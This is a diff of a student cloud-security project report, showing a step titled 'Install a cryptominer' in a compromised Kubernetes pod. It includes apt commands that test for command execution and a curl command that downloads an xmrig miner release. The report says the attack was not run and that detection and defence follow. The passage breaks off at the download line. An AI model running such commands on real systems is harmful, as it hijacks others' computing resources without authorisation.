JadenQ/Cloud-Computing-Security-ProjectPage/report.md

   ###### Step3: Install a cryptominer

 1. Test that if we can execute any command and access the whole file system in the pod.

 ```shell
 apt remove curl -y
 apt install curl -y
 ```

 	2. Download, install and run crypto miner.
-(For now, the lab enviroment is down and safety concerns, we didn't actually run the attack, we demostrate the way to detect and defense in the following steps).
+(For now, the lab enviroment is down and for safety concerns, we didn't actually run the attack, we demostrate the way to detect and defense in the following steps).

 ```shell
 curl -OL https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-static-x64.tar.gz